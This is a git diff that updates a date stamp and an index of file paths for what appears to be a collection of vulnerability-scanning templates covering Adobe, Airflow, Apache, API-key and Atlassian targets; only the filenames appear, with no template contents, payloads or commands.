diff --git a/date.txt b/date.txt index 563336a826..8671e9f826 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240519 +20240520 diff --git a/poc.txt b/poc.txt index 7c09607ef0..2456eac091 100644 --- a/poc.txt +++ b/poc.txt @@ -17,9 +17,8 @@ ./poc/adobe/adobe-coldfusion-detect-4.yaml ./poc/adobe/adobe-coldfusion-detect-5.yaml ./poc/adobe/adobe-coldfusion-detect-6.yaml -./poc/adobe/adobe-coldfusion-detect-82.yaml +./poc/adobe/adobe-coldfusion-detect-83.yaml ./poc/adobe/adobe-coldfusion-detect-84.yaml -./poc/adobe/adobe-coldfusion-detect.yaml ./poc/adobe/adobe-coldfusion-detector-1.yaml ./poc/adobe/adobe-coldfusion-detector-2.yaml ./poc/adobe/adobe-coldfusion-detector-3.yaml @@ -33,6 +32,7 @@ ./poc/adobe/adobe-component-login-1.yaml ./poc/adobe/adobe-component-login-2.yaml ./poc/adobe/adobe-component-login-89.yaml +./poc/adobe/adobe-component-login-91.yaml ./poc/adobe/adobe-component-login-92.yaml ./poc/adobe/adobe-component-login.yaml ./poc/adobe/adobe-connect-central-login-94.yaml @@ -46,6 +46,7 @@ ./poc/adobe/adobe-connect-username-exposure.yaml ./poc/adobe/adobe-connect-version-102.yaml ./poc/adobe/adobe-connect-version-103.yaml +./poc/adobe/adobe-connect-version.yaml ./poc/adobe/adobe-connect.yaml ./poc/adobe/adobe-cq5.yaml ./poc/adobe/adobe-experience-manager-login-105.yaml @@ -59,6 +60,7 @@ ./poc/adobe/adobe-magento.yaml ./poc/adobe/adobe-media-server-110.yaml ./poc/adobe/adobe-media-server-111.yaml +./poc/adobe/adobe-media-server-112.yaml ./poc/adobe/adobe-media-server-113.yaml ./poc/adobe/adobe-media-server-114.yaml ./poc/adobe/adobe-media-server-115.yaml @@ -66,14 +68,13 @@ ./poc/adobe/adobe-robohelp.yaml ./poc/adobe/adobe-secret.yaml ./poc/adobe/aem-acs-common.yaml -./poc/adobe/aem-bg-servlet-127.yaml ./poc/adobe/aem-bg-servlet-128.yaml ./poc/adobe/aem-bg-servlet-129.yaml ./poc/adobe/aem-cached-pages-131.yaml ./poc/adobe/aem-cached-pages.yaml ./poc/adobe/aem-cms-finder.yaml ./poc/adobe/aem-crx-bypass-1.yaml -./poc/adobe/aem-crx-bypass-132.yaml +./poc/adobe/aem-crx-bypass-133.yaml ./poc/adobe/aem-crx-bypass-134.yaml ./poc/adobe/aem-crx-bypass-2.yaml ./poc/adobe/aem-crx-list-packages.yaml @@ -84,9 +85,8 @@ ./poc/adobe/aem-default-get-servlet-11.yaml ./poc/adobe/aem-default-get-servlet-12.yaml ./poc/adobe/aem-default-get-servlet-13.yaml -./poc/adobe/aem-default-get-servlet-135.yaml +./poc/adobe/aem-default-get-servlet-136.yaml ./poc/adobe/aem-default-get-servlet-137.yaml -./poc/adobe/aem-default-get-servlet-138.yaml ./poc/adobe/aem-default-get-servlet-139.yaml ./poc/adobe/aem-default-get-servlet-14.yaml ./poc/adobe/aem-default-get-servlet-15.yaml @@ -140,9 +140,9 @@ ./poc/adobe/aem-default-get-servlet-8.yaml ./poc/adobe/aem-default-get-servlet-9.yaml ./poc/adobe/aem-default-get-servlet.yaml -./poc/adobe/aem-default-login-140.yaml ./poc/adobe/aem-default-login-141.yaml ./poc/adobe/aem-default-login-142.yaml +./poc/adobe/aem-default-login.yaml ./poc/adobe/aem-detection-143.yaml ./poc/adobe/aem-detection-144.yaml ./poc/adobe/aem-detection-146.yaml @@ -153,19 +153,18 @@ ./poc/adobe/aem-fuzz.yaml ./poc/adobe/aem-gql-servlet-147.yaml ./poc/adobe/aem-gql-servlet-148.yaml -./poc/adobe/aem-gql-servlet-149.yaml +./poc/adobe/aem-gql-servlet-150.yaml ./poc/adobe/aem-gql-servlet.yaml ./poc/adobe/aem-groovyconsole-151.yaml ./poc/adobe/aem-groovyconsole-152.yaml -./poc/adobe/aem-groovyconsole-154.yaml +./poc/adobe/aem-groovyconsole-153.yaml ./poc/adobe/aem-groovyconsole-155.yaml ./poc/adobe/aem-groovyconsole-156.yaml ./poc/adobe/aem-hash-querybuilder-157.yaml ./poc/adobe/aem-hash-querybuilder-158.yaml +./poc/adobe/aem-hash-querybuilder-159.yaml ./poc/adobe/aem-hash-querybuilder-160.yaml -./poc/adobe/aem-hash-querybuilder-161.yaml ./poc/adobe/aem-hash-querybuilder.yaml -./poc/adobe/aem-jcr-querybuilder-162.yaml ./poc/adobe/aem-jcr-querybuilder-163.yaml ./poc/adobe/aem-jcr-querybuilder-164.yaml ./poc/adobe/aem-jcr-querybuilder-165.yaml @@ -173,22 +172,21 @@ ./poc/adobe/aem-list-custom.yaml ./poc/adobe/aem-login-status-167.yaml ./poc/adobe/aem-login-status-168.yaml -./poc/adobe/aem-login-status-169.yaml ./poc/adobe/aem-login-status-170.yaml ./poc/adobe/aem-login-status-171.yaml ./poc/adobe/aem-merge-metadata-servlet-172.yaml ./poc/adobe/aem-merge-metadata-servlet-173.yaml -./poc/adobe/aem-merge-metadata-servlet.yaml +./poc/adobe/aem-merge-metadata-servlet-174.yaml ./poc/adobe/aem-misc-admin.yaml ./poc/adobe/aem-offloading-browser.yaml ./poc/adobe/aem-osgi-bundles.yaml -./poc/adobe/aem-querybuilder-feed-servlet-175.yaml ./poc/adobe/aem-querybuilder-feed-servlet-176.yaml +./poc/adobe/aem-querybuilder-feed-servlet-177.yaml ./poc/adobe/aem-querybuilder-feed-servlet.yaml ./poc/adobe/aem-querybuilder-internal-path-read-1.yaml ./poc/adobe/aem-querybuilder-internal-path-read-178.yaml ./poc/adobe/aem-querybuilder-internal-path-read-179.yaml -./poc/adobe/aem-querybuilder-internal-path-read-181.yaml +./poc/adobe/aem-querybuilder-internal-path-read-180.yaml ./poc/adobe/aem-querybuilder-internal-path-read-2.yaml ./poc/adobe/aem-querybuilder-internal-path-read-3.yaml ./poc/adobe/aem-querybuilder-internal-path-read-4.yaml @@ -198,8 +196,10 @@ ./poc/adobe/aem-querybuilder-json-servlet-184.yaml ./poc/adobe/aem-querybuilder-json-servlet-185.yaml ./poc/adobe/aem-querybuilder-json-servlet.yaml +./poc/adobe/aem-secrets.yaml ./poc/adobe/aem-security-users.yaml ./poc/adobe/aem-setpreferences-xss-189.yaml +./poc/adobe/aem-setpreferences-xss.yaml ./poc/adobe/aem-sling-login.yaml ./poc/adobe/aem-userinfo-servlet-191.yaml ./poc/adobe/aem-userinfo-servlet-192.yaml @@ -219,27 +219,24 @@ ./poc/adobe/libwww-perl-daemon.yaml ./poc/adobe/mdaemon-email-server.yaml ./poc/adobe/mjniohttpdaemon.yaml -./poc/adobe/possible-AEM-secrets.yaml ./poc/adobe/servudaemon-ini.yaml ./poc/airflow/Airflow-Unauth.yaml ./poc/airflow/Airflow-unauthorized.yaml ./poc/airflow/airflow-api-exposure.yaml ./poc/airflow/airflow-configuration-exposure-229.yaml ./poc/airflow/airflow-configuration-exposure-230.yaml -./poc/airflow/airflow-debug-231.yaml ./poc/airflow/airflow-debug-232.yaml +./poc/airflow/airflow-debug-233.yaml ./poc/airflow/airflow-debug.yaml ./poc/airflow/airflow-default-credentials.yaml -./poc/airflow/airflow-default-login-234.yaml ./poc/airflow/airflow-default-login-235.yaml -./poc/airflow/airflow-default-login.yaml +./poc/airflow/airflow-default-login-236.yaml ./poc/airflow/airflow-detect-237.yaml ./poc/airflow/airflow-detect-238.yaml -./poc/airflow/airflow-detect-239.yaml -./poc/airflow/airflow-detect.yaml +./poc/airflow/airflow-detect-240.yaml ./poc/airflow/airflow-exposure.yaml -./poc/airflow/airflow-panel-241.yaml ./poc/airflow/airflow-panel-243.yaml +./poc/airflow/airflow-panel-244.yaml ./poc/airflow/airflow-panel-245.yaml ./poc/airflow/airflow-panel.yaml ./poc/airflow/airflow-unauth.yaml @@ -281,15 +278,14 @@ ./poc/apache/apache-axis-detect-3.yaml ./poc/apache/apache-axis-detect-339.yaml ./poc/apache/apache-axis-detect-340.yaml -./poc/apache/apache-axis-detect-341.yaml ./poc/apache/apache-axis.yaml ./poc/apache/apache-axis2.yaml -./poc/apache/apache-cocoon-detect-342.yaml +./poc/apache/apache-cocoon-detect.yaml ./poc/apache/apache-cocoon.yaml ./poc/apache/apache-config-343.yaml +./poc/apache/apache-config-344.yaml ./poc/apache/apache-config-exposure.yaml ./poc/apache/apache-config-plain-password.yaml -./poc/apache/apache-config.yaml ./poc/apache/apache-couchdb-unauth.yaml ./poc/apache/apache-couchdb.yaml ./poc/apache/apache-detect-345.yaml @@ -315,6 +311,7 @@ ./poc/apache/apache-flink-unauth-rce-355.yaml ./poc/apache/apache-flink-unauth-rce-356.yaml ./poc/apache/apache-flink-unauth-rce-357.yaml +./poc/apache/apache-flink-unauth-rce-358.yaml ./poc/apache/apache-flink-unauth-rce-359.yaml ./poc/apache/apache-flink-upload-rce.yml ./poc/apache/apache-flink.yaml @@ -332,6 +329,7 @@ ./poc/apache/apache-httpd-cve-2021-40438-ssrf.yml ./poc/apache/apache-httpd-cve-2021-41773-path-traversal.yml ./poc/apache/apache-httpd-cve-2021-41773-rce.yml +./poc/apache/apache-httpd-rce-362.yaml ./poc/apache/apache-httpd-rce-363.yaml ./poc/apache/apache-httpd-rce.yaml ./poc/apache/apache-impala.yaml @@ -348,7 +346,7 @@ ./poc/apache/apache-nifi.yaml ./poc/apache/apache-ofbiz-cve-2018-8033-xxe.yml ./poc/apache/apache-ofbiz-cve-2020-9496-xml-deserialization.yml -./poc/apache/apache-ofbiz-log4j-rce-366.yaml +./poc/apache/apache-ofbiz-log4j-rce.yaml ./poc/apache/apache-ofbiz.yaml ./poc/apache/apache-oozie-web-console.yaml ./poc/apache/apache-ranger.yaml @@ -360,9 +358,9 @@ ./poc/apache/apache-skywalking.yaml ./poc/apache/apache-solr-91-rce.yaml ./poc/apache/apache-solr-file-read-367.yaml +./poc/apache/apache-solr-file-read-368.yaml ./poc/apache/apache-solr-file-read-369.yaml ./poc/apache/apache-solr-file-read-370.yaml -./poc/apache/apache-solr-file-read.yaml ./poc/apache/apache-solr-log4j-CVE-2021-44228.yaml ./poc/apache/apache-solr-log4j-rce-372.yaml ./poc/apache/apache-solr-log4j-rce.yaml @@ -385,7 +383,6 @@ ./poc/apache/apache-tomcat-cve-2022-34305.yaml ./poc/apache/apache-tomcat-snoop-374.yaml ./poc/apache/apache-tomcat-snoop-376.yaml -./poc/apache/apache-tomcat-snoop-377.yaml ./poc/apache/apache-tomcat-snoop-cookie-handling.yaml ./poc/apache/apache-tomcat-snoop-ip-disclosure.yaml ./poc/apache/apache-tomcat-snoop.yaml @@ -400,12 +397,13 @@ ./poc/apache/default-apache-test-all-6812.yaml ./poc/apache/default-apache-test-all-6814.yaml ./poc/apache/default-apache-test-all-6815.yaml -./poc/apache/default-apache-test-page-6816.yaml +./poc/apache/default-apache-test-all.yaml ./poc/apache/default-apache-test-page-6817.yaml ./poc/apache/default-apache-test-page-6818.yaml ./poc/apache/default-apache-test-page-6819.yaml ./poc/apache/default-apache2-page-6804.yaml ./poc/apache/default-apache2-page-6805.yaml +./poc/apache/default-apache2-page-6806.yaml ./poc/apache/default-apache2-page-6807.yaml ./poc/apache/default-apache2-ubuntu-page-6808.yaml ./poc/apache/default-apache2-ubuntu-page-6809.yaml @@ -447,16 +445,14 @@ ./poc/api/api-abstractapi-383.yaml ./poc/api/api-abstractapi.yaml ./poc/api/api-abuseipdb-384.yaml -./poc/api/api-abuseipdb-385.yaml -./poc/api/api-accuweather.yaml -./poc/api/api-adafruit-io.yaml +./poc/api/api-accuweather-386.yaml +./poc/api/api-adafruit-io-387.yaml ./poc/api/api-aletheia.yaml ./poc/api/api-alienvault-388.yaml ./poc/api/api-alienvault-389.yaml ./poc/api/api-alienvault-390.yaml ./poc/api/api-apigee-edge-391.yaml -./poc/api/api-appveyor.yaml -./poc/api/api-asana-393.yaml +./poc/api/api-appveyor-392.yaml ./poc/api/api-asana.yaml ./poc/api/api-aviationstack.yaml ./poc/api/api-bearer-auth-a2f3021256bf5d76bbaeaff6f05d43fd.yaml @@ -464,16 +460,15 @@ ./poc/api/api-bible.yaml ./poc/api/api-bing-map-2018-bdd86a2dc395718687e612b89b6cd720.yaml ./poc/api/api-bing-map-2018.yaml -./poc/api/api-bingmaps.yaml -./poc/api/api-bitly-396.yaml +./poc/api/api-bingmaps-395.yaml ./poc/api/api-bitly.yaml -./poc/api/api-bitrise-397.yaml -./poc/api/api-block.yaml +./poc/api/api-bitrise.yaml +./poc/api/api-block-400.yaml +./poc/api/api-blockchain-398.yaml ./poc/api/api-blockchain-399.yaml -./poc/api/api-blockchain.yaml ./poc/api/api-bravenewcoin.yaml ./poc/api/api-breezometer.yaml -./poc/api/api-buildkite-402.yaml +./poc/api/api-buildkite.yaml ./poc/api/api-buttercms-403.yaml ./poc/api/api-calendly-404.yaml ./poc/api/api-carboninterface.yaml @@ -482,23 +477,24 @@ ./poc/api/api-clearbit-407.yaml ./poc/api/api-climatiq.yaml ./poc/api/api-cloudmersive.yaml -./poc/api/api-coinapi-408.yaml +./poc/api/api-coinapi.yaml +./poc/api/api-cooperhewitt-409.yaml ./poc/api/api-cooperhewitt-410.yaml ./poc/api/api-cooperhewitt-411.yaml ./poc/api/api-covalent-412.yaml -./poc/api/api-dbt.yaml +./poc/api/api-dbt-413.yaml ./poc/api/api-debounce-414.yaml -./poc/api/api-deviantart-415.yaml +./poc/api/api-deviantart.yaml ./poc/api/api-dribbble-416.yaml ./poc/api/api-dribbble-417.yaml ./poc/api/api-dropbox-418.yaml -./poc/api/api-dropbox.yaml ./poc/api/api-endpoints.yaml ./poc/api/api-europeana-419.yaml -./poc/api/api-europeana-421.yaml +./poc/api/api-europeana-420.yaml ./poc/api/api-facebook-422.yaml +./poc/api/api-fastly-424.yaml ./poc/api/api-fastly.yml -./poc/api/api-festivo-425.yaml +./poc/api/api-festivo.yaml ./poc/api/api-fixer.yaml ./poc/api/api-fontawesome-426.yaml ./poc/api/api-fortitoken-cloud.yaml @@ -506,15 +502,15 @@ ./poc/api/api-fullhunt-428.yaml ./poc/api/api-github.yaml ./poc/api/api-gitlab-431.yaml -./poc/api/api-gitlab.yml -./poc/api/api-google-drive.yaml +./poc/api/api-gitlab.yaml +./poc/api/api-google-drive-432.yaml ./poc/api/api-harvardart-433.yaml -./poc/api/api-heroku-435.yaml +./poc/api/api-harvardart-434.yaml +./poc/api/api-heroku.yaml ./poc/api/api-hirak-rates-436.yaml ./poc/api/api-hubspot-437.yaml -./poc/api/api-iconfinder-439.yaml -./poc/api/api-iconfinder.yaml -./poc/api/api-improvmx-440.yaml +./poc/api/api-iconfinder-438.yaml +./poc/api/api-improvmx.yaml ./poc/api/api-info-themes-plugins-wp-org-66caa0b56de1f5b395ccb9edd74d127d.yaml ./poc/api/api-info-themes-plugins-wp-org-a5ba91db466ae424f41944b08096d121.yaml ./poc/api/api-info-themes-plugins-wp-org-b2b4c6858b9f9bf1ce417b44adf44c1b.yaml @@ -523,91 +519,92 @@ ./poc/api/api-info-themes-plugins-wp-org-plugin.yaml ./poc/api/api-info-themes-plugins-wp-org.yaml ./poc/api/api-instagram.yaml -./poc/api/api-instatus-442.yaml -./poc/api/api-intercom-443.yaml +./poc/api/api-instatus.yaml +./poc/api/api-intercom.yaml ./poc/api/api-ipapi.yaml ./poc/api/api-ipstack-444.yaml +./poc/api/api-ipstack.yaml ./poc/api/api-iqair.yaml ./poc/api/api-iterable-445.yaml -./poc/api/api-jumpcloud-446.yaml +./poc/api/api-jumpcloud.yaml ./poc/api/api-key-for-google-maps-b973f74f4310543c7180ee3869335562.yaml ./poc/api/api-key-for-google-maps.yaml ./poc/api/api-keys.yaml ./poc/api/api-languagelayer.yaml -./poc/api/api-launchdarkly.yaml +./poc/api/api-launchdarkly-449.yaml ./poc/api/api-leanix-450.yaml ./poc/api/api-linkedin-451.yaml ./poc/api/api-linkfinder.yaml ./poc/api/api-lokalise-452.yaml -./poc/api/api-loqate.yaml +./poc/api/api-lokalise.yaml +./poc/api/api-loqate-453.yaml ./poc/api/api-mailchimp-454.yaml +./poc/api/api-mailchimp.yaml ./poc/api/api-mailgun-455.yaml +./poc/api/api-mailgun.yaml ./poc/api/api-malshare-456.yaml +./poc/api/api-malshare-457.yaml +./poc/api/api-malwarebazaar-458.yaml ./poc/api/api-malwarebazaar-459.yaml ./poc/api/api-mapbox-465.yaml -./poc/api/api-mapbox.yaml ./poc/api/api-marketstack.yaml ./poc/api/api-mediastack.yaml -./poc/api/api-mojoauth-466.yaml +./poc/api/api-mojoauth.yaml ./poc/api/api-mywot-467.yaml -./poc/api/api-mywot-468.yaml -./poc/api/api-nerdgraph-469.yaml ./poc/api/api-nerdgraph.yaml -./poc/api/api-netlify-470.yaml +./poc/api/api-netlify.yaml ./poc/api/api-npm-471.yaml -./poc/api/api-onelogin-472.yaml +./poc/api/api-onelogin.yaml ./poc/api/api-openweather-473.yaml -./poc/api/api-optimizely-474.yaml +./poc/api/api-optimizely.yaml ./poc/api/api-pagerduty-475.yaml ./poc/api/api-particle-476.yaml -./poc/api/api-pastebin-477.yaml +./poc/api/api-pastebin.yaml ./poc/api/api-paypal.yaml -./poc/api/api-pendo-479.yaml -./poc/api/api-petfinder.yaml +./poc/api/api-pendo.yaml +./poc/api/api-petfinder-480.yaml ./poc/api/api-pinata-481.yaml ./poc/api/api-pivotaltracker-482.yaml +./poc/api/api-pivotaltracker.yaml ./poc/api/api-positionstack.yaml ./poc/api/api-postmark-483.yaml ./poc/api/api-quip-484.yaml ./poc/api/api-rate-limit-exceeded.yaml ./poc/api/api-reviewapi.yaml ./poc/api/api-rijksmuseum-485.yaml +./poc/api/api-rijksmuseum.yaml ./poc/api/api-scanii-487.yaml ./poc/api/api-screenshotlayer.yaml ./poc/api/api-seatgeek.yaml ./poc/api/api-sendgrid-489.yaml ./poc/api/api-slack-493.yaml -./poc/api/api-slack.yaml ./poc/api/api-sonarcloud-494.yaml +./poc/api/api-sonarcloud.yaml ./poc/api/api-sportdataapi.yaml ./poc/api/api-spotify.yaml ./poc/api/api-square-496.yaml -./poc/api/api-square.yaml ./poc/api/api-sslmate-497.yaml ./poc/api/api-strava-498.yaml ./poc/api/api-stripe-499.yaml -./poc/api/api-stytch-500.yaml -./poc/api/api-taiga.yaml -./poc/api/api-thecatapi-502.yaml -./poc/api/api-thecatapi.yaml +./poc/api/api-stytch.yaml +./poc/api/api-taiga-501.yaml +./poc/api/api-thecatapi-503.yaml ./poc/api/api-tink-504.yaml ./poc/api/api-tinypng-505.yaml ./poc/api/api-travisci-506.yaml -./poc/api/api-twitter-507.yaml -./poc/api/api-urlscan-508.yaml +./poc/api/api-twitter.yaml +./poc/api/api-urlscan-509.yaml +./poc/api/api-urlscan.yaml ./poc/api/api-users-exposed.yaml -./poc/api/api-vercel.yaml -./poc/api/api-virustotal-511.yaml +./poc/api/api-vercel-510.yaml ./poc/api/api-virustotal-512.yaml ./poc/api/api-visualstudio-513.yaml ./poc/api/api-visualstudio.yaml ./poc/api/api-wakatime-514.yaml -./poc/api/api-wakatime.yaml ./poc/api/api-weatherstack.yaml -./poc/api/api-webex.yaml +./poc/api/api-webex-515.yaml ./poc/api/api-weglot-516.yaml ./poc/api/api-wordcloud-518.yaml -./poc/api/api-wordcloud.yaml ./poc/api/api-youtube.yaml ./poc/api/api-zenserp.yaml ./poc/api/api-zipcodebase.yaml @@ -620,14 +617,12 @@ ./poc/api/apilayer-caddy.yaml ./poc/api/apiman-panel-460.yaml ./poc/api/apiman-panel-461.yaml -./poc/api/apiman-panel-462.yaml ./poc/api/apiman-panel-463.yaml -./poc/api/apiman-panel.yaml ./poc/api/apisix-default-login-490.yaml ./poc/api/apisix-default-login-492.yaml ./poc/api/apisix-panel.yaml ./poc/api/apisix-workflow.yaml -./poc/api/arcgis-rest-api-533.yaml +./poc/api/arcgis-rest-api-532.yaml ./poc/api/arcgis-rest-api.yaml ./poc/api/artifactory-api-password-550.yaml ./poc/api/artifactory-api-password.yaml @@ -639,11 +634,10 @@ ./poc/api/bems-api-lfi-708.yaml ./poc/api/bems-api-lfi-710.yaml ./poc/api/bems-api-lfi-711.yaml -./poc/api/burp-api-detect-809.yaml ./poc/api/burp-api-detect-810.yaml -./poc/api/burp-api-detect-811.yaml ./poc/api/burp-api-detect-812.yaml ./poc/api/burp-api-detect-813.yaml +./poc/api/burp-api-detect.yaml ./poc/api/cart-rest-api-for-woocommerce-863e46252f4619353ac6e316726d18cc.yaml ./poc/api/cart-rest-api-for-woocommerce.yaml ./poc/api/clickhouse-api-unauth.yaml @@ -656,8 +650,7 @@ ./poc/api/contentful-api-token.yaml ./poc/api/couchbase-buckets-api-1230.yaml ./poc/api/couchbase-buckets-api-1231.yaml -./poc/api/couchbase-buckets-api-1232.yaml -./poc/api/couchbase-buckets-api-1233.yaml +./poc/api/couchbase-buckets-api.yaml ./poc/api/couchbase-buckets-rest-api.yaml ./poc/api/cpanel-api-codes.yaml ./poc/api/cratesio-api-key.yaml @@ -717,7 +710,6 @@ ./poc/api/fastapi-3.yaml ./poc/api/fastapi-4.yaml ./poc/api/fastapi-5.yaml -./poc/api/fastapi-docs-7398.yaml ./poc/api/fastapi-docs-7399.yaml ./poc/api/fastapi-docs.yaml ./poc/api/fastly-api-token.yaml @@ -739,9 +731,9 @@ ./poc/api/gitlab-user-open-api-7703.yaml ./poc/api/gitlab-user-open-api.yaml ./poc/api/gmail-api-client-secrets-7740.yaml -./poc/api/gmail-api-client-secrets-7741.yaml ./poc/api/gmail-api-client-secrets.yaml ./poc/api/goSwaggerAPI.yaml +./poc/api/google-api-7771.yaml ./poc/api/google-api-7772.yaml ./poc/api/google-api-key-7767.yaml ./poc/api/google-api-key-7768.yaml @@ -758,6 +750,7 @@ ./poc/api/graylog-api-browser-7848.yaml ./poc/api/hidden-api-endpoint-discovery.yaml ./poc/api/hidden-api-key-exposure.yaml +./poc/api/http-etcd-unauthenticated-api-data-leak-8056.yaml ./poc/api/http-etcd-unauthenticated-api-data-leak-8057.yaml ./poc/api/http-etcd-unauthenticated-api-data-leak.yaml ./poc/api/iis-enum-httpapi.yaml @@ -782,18 +775,15 @@ ./poc/api/kube-api-deployments-8504.yaml ./poc/api/kube-api-namespaces-8505.yaml ./poc/api/kube-api-namespaces-8506.yaml -./poc/api/kube-api-namespaces.yaml ./poc/api/kube-api-nodes-8507.yaml -./poc/api/kube-api-nodes-8508.yaml -./poc/api/kube-api-nodes.yaml ./poc/api/kube-api-pods-8509.yaml -./poc/api/kube-api-pods-8510.yaml +./poc/api/kube-api-pods.yaml ./poc/api/kube-api-roles.yaml ./poc/api/kube-api-scan.yaml ./poc/api/kube-api-secrets-8511.yaml -./poc/api/kube-api-services-8513.yaml +./poc/api/kube-api-secrets-8512.yaml +./poc/api/kube-api-secrets.yaml ./poc/api/kube-api-services-8514.yaml -./poc/api/kube-api-services.yaml ./poc/api/kubernetes-api-detect.yaml ./poc/api/kubernetes-pods-api.yaml ./poc/api/loqate-api-key.yaml @@ -802,10 +792,10 @@ ./poc/api/magento-2-exposed-api-3.yaml ./poc/api/magento-2-exposed-api-8687.yaml ./poc/api/magento-2-exposed-api-8688.yaml -./poc/api/magento-2-exposed-api-8689.yaml -./poc/api/mailchimp-api-11854.yaml +./poc/api/mailchimp-api(1).yaml ./poc/api/mailchimp-api-key-8723.yaml ./poc/api/mailchimp-api-key-8724.yaml +./poc/api/mailchimp-api-key-8725.yaml ./poc/api/mailchimp-api-key-8726.yaml ./poc/api/mailchimp-api-key.yaml ./poc/api/mailchimp-api.yaml @@ -864,7 +854,7 @@ ./poc/api/openapi-1.yaml ./poc/api/openapi-2.yaml ./poc/api/picatic-api-key-9574.yaml -./poc/api/pictatic-api-key-9575.yaml +./poc/api/pictatic-api-key-9576.yaml ./poc/api/pictatic-api-key.yaml ./poc/api/postman-api-key-disclosure.yaml ./poc/api/public-jamf-api.yaml @@ -885,13 +875,12 @@ ./poc/api/sendgrid-api-11859.yaml ./poc/api/sendgrid-api-key-10140.yaml ./poc/api/sendgrid-api-key-10141.yaml -./poc/api/sendgrid-api-key-10142.yaml ./poc/api/sendgrid-api.yaml ./poc/api/shiziyu-ApigoodsController-sqlinjection.yaml ./poc/api/shiziyu-CMS-ApigoodController.class.php-SQL.yaml ./poc/api/shiziyu-apicontroller-sqlinjection.yaml ./poc/api/shiziyu-cms-apicontroller-sqli.yml -./poc/api/slack-api-11864.yaml +./poc/api/slack-api(1).yaml ./poc/api/slack-api-token.yaml ./poc/api/slack-api.yaml ./poc/api/spark-api-unauth.yaml @@ -910,14 +899,13 @@ ./poc/api/strapi-documentation-10543.yaml ./poc/api/strapi-documentation.yaml ./poc/api/strapi-page-1.yaml -./poc/api/strapi-page-10544.yaml ./poc/api/strapi-page-10545.yaml ./poc/api/strapi-page-10546.yaml ./poc/api/strapi-page-10547.yaml ./poc/api/strapi-page-2.yaml ./poc/api/strapi-panel-10548.yaml ./poc/api/strapi-panel.yaml -./poc/api/stripe-api-key-11869.yaml +./poc/api/stripe-api-key(1).yaml ./poc/api/stripe-api-key.yaml ./poc/api/swagger-api-1.yaml ./poc/api/swagger-api-10.yaml @@ -925,6 +913,7 @@ ./poc/api/swagger-api-10592.yaml ./poc/api/swagger-api-10593.yaml ./poc/api/swagger-api-10594.yaml +./poc/api/swagger-api-10595.yaml ./poc/api/swagger-api-11.yaml ./poc/api/swagger-api-12.yaml ./poc/api/swagger-api-13.yaml @@ -1000,12 +989,14 @@ ./poc/api/swagger-api.yaml ./poc/api/tongda-api-ali-fileupload.yaml ./poc/api/tongda-oa-api-ali-upload.yaml -./poc/api/twilio-api-10861.yaml +./poc/api/twilio-api-10860.yaml ./poc/api/twilio-api.yaml +./poc/api/unauth-spark-api-10961.yaml ./poc/api/unauth-spark-api-10962.yaml ./poc/api/unauth-spark-api-10963.yaml ./poc/api/unauth-spark-api-10964.yaml ./poc/api/unauth-spark-api-10965.yaml +./poc/api/unauth-spark-api.yaml ./poc/api/versa-director-api-detect.yaml ./poc/api/video-conferencing-with-zoom-api-075bf74052a0ad5436e52ba850a78457.yaml ./poc/api/video-conferencing-with-zoom-api-123050da768f674023e8ffc84b941d85.yaml @@ -1025,6 +1016,7 @@ ./poc/api/video-conferencing-with-zoom-api.yaml ./poc/api/wadl-api-1.yaml ./poc/api/wadl-api-11082.yaml +./poc/api/wadl-api-11083.yaml ./poc/api/wadl-api-11084.yaml ./poc/api/wadl-api-11085.yaml ./poc/api/wadl-api-2.yaml @@ -1033,7 +1025,6 @@ ./poc/api/wadl-api-5.yaml ./poc/api/wadl-api-6.yaml ./poc/api/wadl-api-7.yaml -./poc/api/wadl-api.yaml ./poc/api/wcfm-marketplace-rest-api-83211a697400a39f3ef0aefc82922e72.yaml ./poc/api/wcfm-marketplace-rest-api.yaml ./poc/api/widget-for-eventbrite-api-6477bf18cad6c823db485408d49b337b.yaml @@ -1051,16 +1042,14 @@ ./poc/api/wpgetapi.yaml ./poc/api/wsdl-api-11632.yaml ./poc/api/wsdl-api-11633.yaml -./poc/api/wsdl-api.yaml ./poc/api/wso2-apimanager-detect-11637.yaml -./poc/api/wso2-apimanager-detect-11638.yaml ./poc/api/wso2-apimanager-detect-11639.yaml ./poc/api/wso2-apimanager-detect.yaml ./poc/api/yapi-detect-11719.yaml ./poc/api/yapi-detect-11721.yaml ./poc/api/yapi-detect-11722.yaml ./poc/api/yapi-rce-11724.yaml -./poc/api/yapi-rce-11726.yaml +./poc/api/yapi-rce-11725.yaml ./poc/api/yapi-rce.yml ./poc/api/yapi-sql-inject.yaml ./poc/api/yapi-workflow.yaml @@ -1090,7 +1079,7 @@ ./poc/atlassian/bitbucket-client-secret.yaml ./poc/atlassian/bitbucket-public-repository.yaml ./poc/atlassian/bitbucket-takeover-738.yaml -./poc/atlassian/bitbucket-takeover-740.yaml +./poc/atlassian/bitbucket-takeover-739.yaml ./poc/atlassian/bitbucket-takeover-741.yaml ./poc/atlassian/bitbucket-takeover.yaml ./poc/atlassian/confluence-cve-2015-8399.yml @@ -1101,14 +1090,14 @@ ./poc/atlassian/confluence-dashboard.yaml ./poc/atlassian/confluence-detect-1.yaml ./poc/atlassian/confluence-detect-1186.yaml -./poc/atlassian/confluence-detect-1188.yaml +./poc/atlassian/confluence-detect-1187.yaml ./poc/atlassian/confluence-detect-1189.yaml ./poc/atlassian/confluence-detect-2.yaml ./poc/atlassian/confluence-detect-3.yaml ./poc/atlassian/confluence-detect-4.yaml ./poc/atlassian/confluence-detect.yaml +./poc/atlassian/confluence-ssrf-sharelinks-1190.yaml ./poc/atlassian/confluence-ssrf-sharelinks-1191.yaml -./poc/atlassian/confluence-ssrf-sharelinks-1192.yaml ./poc/atlassian/confluence-ssrf-sharelinks-1193.yaml ./poc/atlassian/confluence-ssrf-sharelinks-1194.yaml ./poc/atlassian/confluence-workflow-1195.yaml @@ -1131,7 +1120,6 @@ ./poc/atlassian/jira-exploitaiton-workflow.yaml ./poc/atlassian/jira-login-default.yaml ./poc/atlassian/jira-plugin-sqli.yaml -./poc/atlassian/jira-service-desk-signup-8317.yaml ./poc/atlassian/jira-service-desk-signup-8318.yaml ./poc/atlassian/jira-service-desk-signup-8319.yaml ./poc/atlassian/jira-service-desk-signup-8320.yaml @@ -1143,24 +1131,24 @@ ./poc/atlassian/jira-unauthenticated-dashboards-8323.yaml ./poc/atlassian/jira-unauthenticated-dashboards-8324.yaml ./poc/atlassian/jira-unauthenticated-dashboards-8325.yaml -./poc/atlassian/jira-unauthenticated-dashboards-8326.yaml ./poc/atlassian/jira-unauthenticated-dashboards-8327.yaml ./poc/atlassian/jira-unauthenticated-installed-gadgets-8328.yaml 